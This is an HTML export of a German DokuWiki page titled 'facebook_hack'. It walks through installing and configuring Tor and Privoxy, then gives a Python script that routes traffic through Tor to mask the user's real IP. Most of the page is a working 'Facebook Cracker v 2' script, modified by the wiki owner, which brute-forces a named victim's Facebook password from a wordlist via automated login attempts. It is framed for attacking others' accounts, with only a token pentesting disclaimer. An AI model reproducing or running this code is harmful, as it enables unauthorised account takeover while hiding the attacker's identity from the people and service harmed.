<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de"
  lang="de" dir="ltr" class="no-js">
<head>
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <title>facebook_hack [JonnysWiki]</title>
  <script>(function(H){H.className=H.className.replace(/\bno-js\b/,'js')})(document.documentElement)</script>
  <meta name="viewport" content="width=device-width,initial-scale=1" />
  <link rel="shortcut icon" href="lib/tpl/bootstrap3/images/favicon.ico" />
<link rel="apple-touch-icon" href="lib/tpl/bootstrap3/images/apple-touch-icon.png" />
      <link type="text/css" rel="stylesheet" href="lib/tpl/bootstrap3/assets/bootstrap/css/bootstrap.min.css" />
    <script type="text/javascript">/*<![CDATA[*/
    var TPL_CONFIG = {"tableFullWidth":1};
  /*!]]>*/</script>
  <meta name="generator" content="DokuWiki"/>
<meta name="robots" content="noindex,nofollow"/>
<meta name="keywords" content="facebook_hack"/>
<link rel="search" type="application/opensearchdescription+xml" href="lib/exe/opensearch.html" title="JonnysWiki"/>
<link rel="start" href="facebook_hack.html"/>
<link rel="contents" href="facebook_hack.html" title="Übersicht"/>
<link rel="alternate" type="application/rss+xml" title="Letzte Änderungen" />
<link rel="alternate" type="application/rss+xml" title="Aktueller Namensraum" />
<link rel="edit" title="Diese Seite bearbeiten" href="facebook_hack.html"/>
<link rel="alternate" type="text/html" title="HTML Klartext" href="facebook_hack.html"/>
<link rel="alternate" type="text/plain" title="Wiki Markup" href="facebook_hack.html"/>
<link rel="canonical" href="http://j239599.servers.jiffybox.net/doku.php?id=facebook_hack"/>
<link rel="stylesheet" type="text/css" href="lib/exe/css.php.t.bootstrap3.css"/>
<script type="text/javascript">/*<![CDATA[*/var NS='';var SIG=' --- //[[el.topo82@gmail.com|JonnyBravo]] 2016/08/25 12:35//';var JSINFO = {"id":"facebook_hack","namespace":""};
/*!]]>*/</script>
<script type="text/javascript" charset="utf-8" src="lib/exe/js.php.t..js"></script>
  <script type="text/javascript" src="lib/tpl/bootstrap3/assets/bootstrap/js/bootstrap.min.js"></script>
  <style type="text/css">
    body { padding-top: 20px; }
  </style>
  <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
  <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
  <!--[if lt IE 9]>
  <script type="text/javascript" src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
  <script type="text/javascript" src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
  <![endif]-->
</head>
<body class="default page-on-panel">
  <!--[if lte IE 7 ]><div id="IE7"><![endif]--><!--[if IE 8 ]><div id="IE8"><![endif]-->

  <div id="dokuwiki__site" class="container">
    <div id="dokuwiki__top" class="site dokuwiki mode_show tpl_bootstrap3 loggedIn   ">

      
      <!-- header -->
      <div id="dokuwiki__header">
        <nav class="navbar  navbar-default" role="navigation">

  <div class="container-fluid">

    <div class="navbar-header">

      <button class="navbar-toggle" type="button" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>

      <a href="start.html"  accesskey="h" title="[H]" class="navbar-brand"><img src="lib/tpl/bootstrap3/images/logo.png" alt="JonnysWiki" class="pull-left" id="dw__logo" width="20" height="20" /> <span id="dw__title" >JonnysWiki</span></a>
    </div>

    <div class="collapse navbar-collapse">

      <ul class="nav navbar-nav" id="dw__navbar">
        <li>
  <a href="start.html" ><i class="glyphicon glyphicon-home"></i> Home</a></li>
      </ul>

      <div class="navbar-right">

        <form action="start.html" accept-charset="utf-8" class="search" id="dw__search" method="get" role="search"><div class="no"><input type="hidden" name="do" value="search" /><input type="text" placeholder="Suche" id="qsearch__in" accesskey="f" name="id" class="edit" title="[F]" /><button type="submit" title="Suche">Suche</button><div id="qsearch__out" class="ajax_qsearch JSpopup"></div></div></form>
        <ul class="nav navbar-nav" id="dw__tools">
  <li class="dropdown">
    <a href="#" class="dropdown-toggle" data-toggle="dropdown" title="Werkzeuge"><i class="glyphicon glyphicon-wrench"></i> <span class="hidden-lg hidden-md hidden-sm">Werkzeuge</span> <span class="caret"></span></a>
    <ul class="dropdown-menu tools" role="menu">

      <!-- dokuwiki__usertools -->
      <li class="dropdown-header"><i class="glyphicon glyphicon-user"></i> Benutzer-Werkzeuge</li>
      <li><a href="facebook_hack.html"  class="action admin" rel="nofollow" title="Admin"><i class="glyphicon glyphicon-cog"></i> Admin</a></li><li><a href="facebook_hack.html"  class="action profile" rel="nofollow" title="Benutzerprofil"><i class="glyphicon glyphicon-refresh"></i> Benutzerprofil</a></li>
      <li class="divider"></li>

      <!-- dokuwiki__sitetools -->
      <li class="dropdown-header"><i class="glyphicon glyphicon-cog"></i> Webseiten-Werkzeuge</li>
      <li><a href="facebook_hack.html"  class="action recent" accesskey="r" rel="nofollow" title="Letzte Änderungen [R]"><i class="glyphicon glyphicon-list-alt"></i> Letzte Änderungen</a></li><li><a href="facebook_hack.html"  class="action media" rel="nofollow" title="Medien-Manager"><i class="glyphicon glyphicon-picture"></i> Medien-Manager</a></li><li><a href="facebook_hack.html"  class="action index" accesskey="x" rel="nofollow" title="Übersicht [X]"><i class="glyphicon glyphicon-list"></i> Übersicht</a></li>
      <li class="divider"></li>

      <!-- dokuwiki__pagetools -->
      <li class="dropdown-header"><i class="glyphicon glyphicon-file"></i> Seiten-Werkzeuge</li>
      <li><a href="facebook_hack.html"  class="action edit" accesskey="e" rel="nofollow" title="Diese Seite bearbeiten [E]"><i class="glyphicon glyphicon-edit"></i> Diese Seite bearbeiten</a></li><li></li><li><a href="facebook_hack.html"  class="action revs" accesskey="o" rel="nofollow" title="Ältere Versionen [O]"><i class="glyphicon glyphicon-time"></i> Ältere Versionen</a></li><li><a href="facebook_hack.html"  class="action backlink" rel="nofollow" title="Links hierher"><i class="glyphicon glyphicon-link"></i> Links hierher</a></li><li></li><li><a href="#dokuwiki__top"  class="action top" accesskey="t" rel="nofollow" title="Nach oben [T]"><i class="glyphicon glyphicon-chevron-up"></i> Nach oben</a></li><li><a href="facebook_hack.html"  class="action siteexport_addpage" title="Add page"><span>Export Page</span></a></li>
    </ul>
  </li>
</ul>

        <ul class="nav navbar-nav">
          <li>
            <a href="user/jonnybravo"  title="JonnyBravo (jonnybravo)"><i class="glyphicon glyphicon-user"></i><span class="hidden-lg hidden-md hidden-sm"> JonnyBravo (jonnybravo)</span></a>          </li>
          <li><a href="facebook_hack.html"  class="action logout" rel="nofollow" title="Abmelden"><i class="glyphicon glyphicon-log-out"></i> Abmelden</a></li>		  <li></li>        </ul>

      </div>

    </div>
  </div>
</nav>
      </div>
      <!-- /header -->

      
            <div id="dw__breadcrumbs">
        <hr/>
                        <div class="breadcrumb hidden-print"><span class="bchead">Zuletzt angesehen:</span> <span class="bcsep">•</span> <span class="curid"><bdi><a href="facebook_hack.html"  class="breadcrumbs" title="facebook_hack">facebook_hack</a></bdi></span></div>
                <hr/>
      </div>
      
      <p class="pageId text-right">
        <span class="label label-default">facebook_hack</span>
      </p>

      <div class="notify">Hotfix release available fixing authad issues: 2016-06-26a "Elenor of Tsort".
          <a href="http://download.dokuwiki.org">upgrade now!</a> [48.1] <a href="http://www.dokuwiki.org/update_check">(what's this?)</a></div>
      <main class="main row" role="main">

        
        <!-- ********** CONTENT ********** -->
        <article id="dokuwiki__content" class="container" >

          <div class="panel panel-default" > 
            <div class="page group panel-body">

                                          
              <div class="pull-right hidden-print" data-spy="affix" data-offset-top="150" style="z-index:1024; top:10px; right:10px;">
                              </div>

              <!-- wikipage start -->
              
<p>
Tor installieren 
<pre class="code">apt-get install tor</pre>

</p>

<p>
password hash erstellen 
<pre class="code">tor --hash-password mypassword</pre>

</p>

<p>
Datei anpassen /etc/tor/torrc : 
<pre class="code"> 
ControlPort 9051
HashedControlPassword 16:872860B76453A77D60CA2BB8C1A7042072093276A3D701AD684053EC4C&lt;code&gt;</pre>

Git,Python-dev und pytorctl installieren 
</p>

<p>
<pre class="code">apt-get install git
apt-get install python-dev python-pip
#git clone git://github.com/aaronsw/pytorctl.git
#pip install pytorctl/
pip install PySocks</pre>

</p>

<p>
Privoxy installieren : 
<pre class="code">apt-get install privoxy</pre>

</p>

<p>
Datei konfigurieren /etc/privoxy/config  
<pre class="code">forward-socks5 / localhost:9050 .</pre>

</p>

<p>
Python Script run in Tor Beispiel 
<pre class="code python"><span class="kw1">import</span> <span class="kw3">urllib2</span>
<span class="kw1">import</span> <span class="kw3">urllib</span>
<span class="kw1">import</span> json
<span class="kw1">import</span> <span class="kw3">socket</span>
<span class="kw1">import</span> socks
ipcheck_url <span class="sy0">=</span> <span class="st0">'http://checkip.amazonaws.com/'</span>
<span class="co1"># Actual IP.</span>
<span class="kw1">print</span> <span class="kw3">urllib2</span>.<span class="me1">urlopen</span><span class="br0">&#40;</span>ipcheck_url<span class="br0">&#41;</span>.<span class="me1">read</span><span class="br0">&#40;</span><span class="br0">&#41;</span> 
<span class="co1"># Tor IP.</span>
socks.<span class="me1">setdefaultproxy</span><span class="br0">&#40;</span>socks.<span class="me1">PROXY_TYPE_SOCKS5</span><span class="sy0">,</span> <span class="st0">'127.0.0.1'</span><span class="sy0">,</span> <span class="nu0">9050</span><span class="br0">&#41;</span>
<span class="kw3">socket</span>.<span class="kw3">socket</span> <span class="sy0">=</span> socks.<span class="me1">socksocket</span>
<span class="kw1">print</span> <span class="kw3">urllib2</span>.<span class="me1">urlopen</span><span class="br0">&#40;</span>ipcheck_url<span class="br0">&#41;</span>.<span class="me1">read</span><span class="br0">&#40;</span><span class="br0">&#41;</span> 
data <span class="sy0">=</span> json.<span class="me1">loads</span><span class="br0">&#40;</span><span class="kw3">urllib</span>.<span class="me1">urlopen</span><span class="br0">&#40;</span><span class="st0">&quot;http://ip.jsontest.com/&quot;</span><span class="br0">&#41;</span>.<span class="me1">read</span><span class="br0">&#40;</span><span class="br0">&#41;</span><span class="br0">&#41;</span>
<span class="kw1">print</span> data<span class="br0">&#91;</span><span class="st0">&quot;ip&quot;</span><span class="br0">&#93;</span></pre>

</p>

<p>
Bruteforce Skript mit Tor IP : 
</p>

<p>
<pre class="code python"><span class="kw1">import</span> <span class="kw3">urllib2</span>
<span class="kw1">import</span> <span class="kw3">urllib</span>
<span class="kw1">import</span> json
<span class="kw1">import</span> <span class="kw3">socket</span>
<span class="kw1">import</span> socks
&nbsp;
<span class="kw1">import</span> <span class="kw3">sys</span>
<span class="kw1">import</span> <span class="kw3">random</span>
<span class="kw1">import</span> mechanize
<span class="kw1">import</span> <span class="kw3">cookielib</span>
&nbsp;
ipcheck_url <span class="sy0">=</span> <span class="st0">'http://checkip.amazonaws.com/'</span>
<span class="co1"># Actual IP.</span>
<span class="kw1">print</span> <span class="st0">&quot;That is the Reail WAN IP :&quot;</span> + <span class="kw3">urllib2</span>.<span class="me1">urlopen</span><span class="br0">&#40;</span>ipcheck_url<span class="br0">&#41;</span>.<span class="me1">read</span><span class="br0">&#40;</span><span class="br0">&#41;</span> 
<span class="co1"># Tor IP.</span>
socks.<span class="me1">setdefaultproxy</span><span class="br0">&#40;</span>socks.<span class="me1">PROXY_TYPE_SOCKS5</span><span class="sy0">,</span> <span class="st0">'127.0.0.1'</span><span class="sy0">,</span> <span class="nu0">9050</span><span class="br0">&#41;</span>
<span class="kw3">socket</span>.<span class="kw3">socket</span> <span class="sy0">=</span> socks.<span class="me1">socksocket</span>
<span class="kw1">print</span> <span class="st0">&quot;That is the Attack Tor IP :&quot;</span> + <span class="kw3">urllib2</span>.<span class="me1">urlopen</span><span class="br0">&#40;</span>ipcheck_url<span class="br0">&#41;</span>.<span class="me1">read</span><span class="br0">&#40;</span><span class="br0">&#41;</span> 
&nbsp;
<span class="co1">#data = json.loads(urllib.urlopen(&quot;http://ip.jsontest.com/&quot;).read())</span>
<span class="co1">#print data[&quot;ip&quot;]</span>
&nbsp;
<span class="co1">#----------------------------------------------------------------------------------------</span>
&nbsp;
&nbsp;
GHT <span class="sy0">=</span> <span class="st0">'''
        +=======================================+
        |..........Facebook Cracker v 2.........|
        +---------------------------------------+
        |#Author: Mauritania Attacker           |
        |#Contact: www.fb.com/mauritanie.forever|
        |#Date: 02/04/2013                      |
        |#Modify: JonnyBravo Date:09/08/2016    |
        |#This tool is made for pentesting.     |
        |#Changing the Description of this tool |
        |Won't made you the coder ^_^ !!!       |
        |#Respect Coderz ^_^                    |
        |#I take no responsibilities for the    |
        |  use of this program !                |
        +=======================================+
        |..........Facebook Cracker v 2.........|
        +---------------------------------------+
'''</span>
<span class="kw1">print</span> <span class="st0">&quot;Note: - This tool can crack facebook account even if you don't have the email of your victim&quot;</span>
<span class="kw1">print</span> <span class="st0">&quot;# Hit CTRL+C to quit the program&quot;</span>
<span class="kw1">print</span> <span class="st0">&quot;# Use www.graph.facebook.com for more infos about your victim ^_^&quot;</span>
<span class="kw3">email</span> <span class="sy0">=</span> <span class="kw2">str</span><span class="br0">&#40;</span><span class="kw2">raw_input</span><span class="br0">&#40;</span><span class="st0">&quot;# Enter |Email| |Phone number| |Profile ID number| |Username| : &quot;</span><span class="br0">&#41;</span><span class="br0">&#41;</span>
passwordlist <span class="sy0">=</span> <span class="kw2">str</span><span class="br0">&#40;</span><span class="kw2">raw_input</span><span class="br0">&#40;</span><span class="st0">&quot;Enter the name of the password list file : &quot;</span><span class="br0">&#41;</span><span class="br0">&#41;</span>
useragents <span class="sy0">=</span> <span class="br0">&#91;</span><span class="br0">&#40;</span><span class="st0">'User-agent'</span><span class="sy0">,</span> <span class="st0">'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'</span><span class="br0">&#41;</span><span class="br0">&#93;</span>
login <span class="sy0">=</span> <span class="st0">'https://www.facebook.com/login.php?login_attempt=1&amp;lwv=100'</span>
<span class="kw1">def</span> attack<span class="br0">&#40;</span>password<span class="br0">&#41;</span>:
  <span class="kw1">try</span>:
     <span class="kw3">sys</span>.<span class="me1">stdout</span>.<span class="me1">write</span><span class="br0">&#40;</span><span class="st0">&quot;<span class="es0">\r</span>[*] trying %s.. &quot;</span> % password<span class="br0">&#41;</span>
     <span class="kw3">sys</span>.<span class="me1">stdout</span>.<span class="me1">flush</span><span class="br0">&#40;</span><span class="br0">&#41;</span>
     br.<span class="me1">addheaders</span> <span class="sy0">=</span> <span class="br0">&#91;</span><span class="br0">&#40;</span><span class="st0">'User-agent'</span><span class="sy0">,</span> <span class="kw3">random</span>.<span class="me1">choice</span><span class="br0">&#40;</span>useragents<span class="br0">&#41;</span><span class="br0">&#41;</span><span class="br0">&#93;</span>
     <span class="kw3">site</span> <span class="sy0">=</span> br.<span class="kw2">open</span><span class="br0">&#40;</span>login<span class="br0">&#41;</span>
     br.<span class="me1">select_form</span><span class="br0">&#40;</span>nr<span class="sy0">=</span><span class="nu0">0</span><span class="br0">&#41;</span>
     <span class="kw1">print</span> <span class="st0">&quot;cHECK &quot;</span> +  password 
     <span class="co1">##Facebook</span>
     br.<span class="me1">form</span><span class="br0">&#91;</span><span class="st0">'email'</span><span class="br0">&#93;</span> <span class="sy0">=</span> <span class="kw3">email</span>
     br.<span class="me1">form</span><span class="br0">&#91;</span><span class="st0">'pass'</span><span class="br0">&#93;</span> <span class="sy0">=</span> password
     br.<span class="me1">submit</span><span class="br0">&#40;</span><span class="br0">&#41;</span>
     log <span class="sy0">=</span> br.<span class="me1">geturl</span><span class="br0">&#40;</span><span class="br0">&#41;</span>
    <span class="co1"># print log</span>
    <span class="co1"># print login</span>
     <span class="kw1">if</span> log <span class="sy0">!=</span> login:
        <span class="kw1">print</span> <span class="st0">&quot;<span class="es0">\n</span><span class="es0">\n</span><span class="es0">\n</span> [*] Password found .. !!&quot;</span>
        <span class="kw1">print</span> <span class="st0">&quot;<span class="es0">\n</span> [*] Password : %s<span class="es0">\n</span>&quot;</span> % <span class="br0">&#40;</span>password<span class="br0">&#41;</span>
        <span class="kw3">sys</span>.<span class="me1">exit</span><span class="br0">&#40;</span><span class="nu0">1</span><span class="br0">&#41;</span>
  <span class="kw1">except</span> <span class="kw2">KeyboardInterrupt</span>:
        <span class="kw1">print</span> <span class="st0">&quot;<span class="es0">\n</span>[*] Exiting program .. &quot;</span>
        <span class="kw3">sys</span>.<span class="me1">exit</span><span class="br0">&#40;</span><span class="nu0">1</span><span class="br0">&#41;</span>
<span class="kw1">def</span> search<span class="br0">&#40;</span><span class="br0">&#41;</span>:
    <span class="kw1">global</span> password
    <span class="kw1">for</span> password <span class="kw1">in</span> passwords:
        attack<span class="br0">&#40;</span>password.<span class="me1">replace</span><span class="br0">&#40;</span><span class="st0">&quot;<span class="es0">\n</span>&quot;</span><span class="sy0">,</span><span class="st0">&quot;&quot;</span><span class="br0">&#41;</span><span class="br0">&#41;</span>
<span class="kw1">def</span> check<span class="br0">&#40;</span><span class="br0">&#41;</span>:
    <span class="kw1">global</span> br
    <span class="kw1">global</span> passwords
    <span class="kw1">try</span>:
       br <span class="sy0">=</span> mechanize.<span class="me1">Browser</span><span class="br0">&#40;</span><span class="br0">&#41;</span>
       cj <span class="sy0">=</span> <span class="kw3">cookielib</span>.<span class="me1">LWPCookieJar</span><span class="br0">&#40;</span><span class="br0">&#41;</span>
       br.<span class="me1">set_handle_robots</span><span class="br0">&#40;</span><span class="kw2">False</span><span class="br0">&#41;</span>
       br.<span class="me1">set_handle_equiv</span><span class="br0">&#40;</span><span class="kw2">True</span><span class="br0">&#41;</span>
       br.<span class="me1">set_handle_referer</span><span class="br0">&#40;</span><span class="kw2">True</span><span class="br0">&#41;</span>
       br.<span class="me1">set_handle_redirect</span><span class="br0">&#40;</span><span class="kw2">True</span><span class="br0">&#41;</span>
       br.<span class="me1">set_cookiejar</span><span class="br0">&#40;</span>cj<span class="br0">&#41;</span>
       br.<span class="me1">set_handle_refresh</span><span class="br0">&#40;</span>mechanize._http.<span class="me1">HTTPRefreshProcessor</span><span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">,</span> max_time<span class="sy0">=</span><span class="nu0">1</span><span class="br0">&#41;</span>
    <span class="kw1">except</span> <span class="kw2">KeyboardInterrupt</span>:
       <span class="kw1">print</span> <span class="st0">&quot;<span class="es0">\n</span>[*] Exiting program ..<span class="es0">\n</span>&quot;</span>
       <span class="kw3">sys</span>.<span class="me1">exit</span><span class="br0">&#40;</span><span class="nu0">1</span><span class="br0">&#41;</span>
    <span class="kw1">try</span>:
       <span class="kw2">list</span> <span class="sy0">=</span> <span class="kw2">open</span><span class="br0">&#40;</span>passwordlist<span class="sy0">,</span> <span class="st0">&quot;r&quot;</span><span class="br0">&#41;</span>
       passwords <span class="sy0">=</span> <span class="kw2">list</span>.<span class="me1">readlines</span><span class="br0">&#40;</span><span class="br0">&#41;</span>
       k <span class="sy0">=</span> <span class="nu0">0</span>
       <span class="kw1">while</span> k <span class="sy0">&lt;</span> <span class="kw2">len</span><span class="br0">&#40;</span>passwords<span class="br0">&#41;</span>:
          passwords<span class="br0">&#91;</span>k<span class="br0">&#93;</span> <span class="sy0">=</span> passwords<span class="br0">&#91;</span>k<span class="br0">&#93;</span>.<span class="me1">strip</span><span class="br0">&#40;</span><span class="br0">&#41;</span>
          k +<span class="sy0">=</span> <span class="nu0">1</span>
    <span class="kw1">except</span> <span class="kw2">IOError</span>:
        <span class="kw1">print</span> <span class="st0">&quot;<span class="es0">\n</span> [*] Error: check your password list path <span class="es0">\n</span>&quot;</span>
        <span class="kw3">sys</span>.<span class="me1">exit</span><span class="br0">&#40;</span><span class="nu0">1</span><span class="br0">&#41;</span>
    <span class="kw1">except</span> <span class="kw2">KeyboardInterrupt</span>:
        <span class="kw1">print</span> <span class="st0">&quot;<span class="es0">\n</span> [*] Exiting program ..<span class="es0">\n</span>&quot;</span>
        <span class="kw3">sys</span>.<span class="me1">exit</span><span class="br0">&#40;</span><span class="nu0">1</span><span class="br0">&#41;</span>
    <span class="kw1">try</span>:
        <span class="kw1">print</span> GHT
        <span class="kw1">print</span> <span class="st0">&quot; [*] Account to crack : %s&quot;</span> % <span class="br0">&#40;</span><span class="kw3">email</span><span class="br0">&#41;</span>
        <span class="kw1">print</span> <span class="st0">&quot; [*] Loaded :&quot;</span> <span class="sy0">,</span> <span class="kw2">len</span><span class="br0">&#40;</span>passwords<span class="br0">&#41;</span><span class="sy0">,</span> <span class="st0">&quot;passwords&quot;</span>
        <span class="kw1">print</span> <span class="st0">&quot; [*] Cracking, please wait ...&quot;</span>
    <span class="kw1">except</span> <span class="kw2">KeyboardInterrupt</span>:
        <span class="kw1">print</span> <span class="st0">&quot;<span class="es0">\n</span> [*] Exiting program ..<span class="es0">\n</span>&quot;</span>
        <span class="kw3">sys</span>.<span class="me1">exit</span><span class="br0">&#40;</span><span class="nu0">1</span><span class="br0">&#41;</span>
    <span class="kw1">try</span>:
        search<span class="br0">&#40;</span><span class="br0">&#41;</span>
        attack<span class="br0">&#40;</span>password<span class="br0">&#41;</span>
    <span class="kw1">except</span> <span class="kw2">KeyboardInterrupt</span>:
        <span class="kw1">print</span> <span class="st0">&quot;<span class="es0">\n</span> [*] Exiting program ..<span class="es0">\n</span>&quot;</span>
        <span class="kw3">sys</span>.<span class="me1">exit</span><span class="br0">&#40;</span><span class="nu0">1</span><span class="br0">&#41;</span>
<span class="kw1">if</span> __name__ <span class="sy0">==</span> <span class="st0">'__main__'</span>:
    check<span class="br0">&#40;</span><span class="br0">&#41;</span></pre>

</p>

              <!-- wikipage stop -->

                            
            </div>
          </div>

        </article>

        
      </main>

      <footer id="dokuwiki__footer" class="small hidden-print">

        <a href="javascript:void(0)" class="back-to-top hidden-print btn btn-default btn-sm" title="zum Inhalt springen>" id="back-to-top"><i class="glyphicon glyphicon-chevron-up"></i></a>

                <div class="text-right">
          <p class="docInfo">
            <bdi>facebook_hack.txt</bdi> · Zuletzt geändert: 2016/08/24 14:56 von <bdi>jonnybravo</bdi>          </p>
        </div>
                <div class="text-center">
          <p id="dw__license">
            <div class="license">Falls nicht anders bezeichnet, ist der Inhalt dieses Wikis unter der folgenden Lizenz veröffentlicht: <bdi><a href="http://www.gnu.org/licenses/fdl-1.3.html" rel="license" class="urlextern">GNU Free Documentation License 1.3</a></bdi></div>          </p>
                    <p id="dw__badges">
            <a href="http://www.gnu.org/licenses/fdl-1.3.html" rel="license"><img src="lib/images/license/button/gnufdl.png" alt="GNU Free Documentation License 1.3" /></a>            <a href="http://getbootstrap.com" title="Built with Bootstrap 3" >
              <img src="lib/tpl/bootstrap3/images/button-bootstrap3.png" width="80" height="15" alt="Built with Bootstrap 3" />
            </a>
            <a href="http://www.php.net" title="Powered by PHP" >
              <img src="lib/tpl/dokuwiki/images/button-php.gif" width="80" height="15" alt="Powered by PHP" />
            </a>
            <a href="http://validator.w3.org/check/referer" title="Valid HTML5" >
              <img src="lib/tpl/dokuwiki/images/button-html5.png" width="80" height="15" alt="Valid HTML5" />
            </a>
            <a href="http://jigsaw.w3.org/css-validator/check/referer?profile=css3" title="Valid CSS" >
              <img src="lib/tpl/dokuwiki/images/button-css.png" width="80" height="15" alt="Valid CSS" />
            </a>
            <a href="http://dokuwiki.org/" title="Driven by DokuWiki" >
              <img src="lib/tpl/dokuwiki/images/button-dw.png" width="80" height="15" alt="Driven by DokuWiki" />
            </a>
          </p>
                  </div>
      </footer>

      
    </div><!-- /site -->

    <div class="no"><img  width="2" height="1" alt="" /></div>
    <div id="screen__mode" class="no">
      <span class="visible-xs"></span>
      <span class="visible-sm"></span>
      <span class="visible-md"></span>
      <span class="visible-lg"></span>
    </div>
  </div>
  <!--[if ( lte IE 7 | IE 8 ) ]></div><![endif]-->
</body>
</html>
